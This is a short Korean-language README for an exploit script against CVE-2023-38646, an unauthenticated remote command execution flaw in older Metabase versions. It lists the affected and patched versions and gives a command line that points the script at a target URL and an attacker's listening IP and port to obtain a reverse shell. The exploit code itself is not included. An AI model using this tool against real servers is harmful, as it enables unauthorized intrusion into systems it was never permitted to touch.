
이 스크립트는 취약한 Metabase 소프트웨어 버전을 익스플로잇하여 공격자에게 셸을 제공하도록 설계되었습니다.
Metabase 오픈 소스 0.46.6.1 이전 버전과 Metabase Enterprise 1.46.6.1 이전 버전에서는 공격자가 서버의 권한 수준에서 임의의 명령을 실행할 수 있습니다. 인증 없이도 악용이 가능합니다. 그 외 수정된 버전은 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, 1.43.7.2입니다.
Metabase 버전이 취약한 경우, 이 스크립트를 사용하면 공격자가 대상 시스템에서 셸 연결을 얻을 수 있습니다.
python3 CVE-2023-38646.py -u targetURL -lhost LISTEN_IP -lport LISTEN_PORT

저자: @birdm4nw